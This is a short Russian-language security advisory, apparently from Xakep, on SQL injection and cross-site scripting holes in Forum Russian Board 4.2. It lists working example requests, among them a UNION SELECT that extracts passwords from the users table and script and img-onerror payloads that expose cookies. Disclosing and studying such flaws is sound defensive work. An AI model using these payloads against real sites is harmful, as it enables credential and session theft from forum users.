Xakep #305. Многошаговые SQL-инъекции
Программа: Forum Russian Board 4.2
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.
1. SQL-инъекция возможна из-за недостаточной фильтрации входных данных в различных сценариях. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Примеры:
menu_header.php?table_sql[users]=[SQL_CODE]
set.php?name_ig_array[1]=' OR 1=1/*
reply_in.php?subject_reply=1&name_reply= 1&message=1&email_reply=1'&t=1
new.php?m_id=1&t=1&mid=1&cat=3& name_ig_array1[1]=666' union select
password, password from frb_users /*
2. Межсайтовый скриптинг возможен из-за недостаточной обработки HTML тегов. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Примеры:
menu_footer.php?rows_all=> <script>alert("XSS");</script>
menu_tema.php?width_forum=> <script>alert("XSS");</script>
reply.php?m_id=1&t=1&mid=1&cat= 3&name_ig_array[1]="> <script>alert("XSS");</script>
[img]wink.gif onerror=javascript:alert (document.cookie);[/img]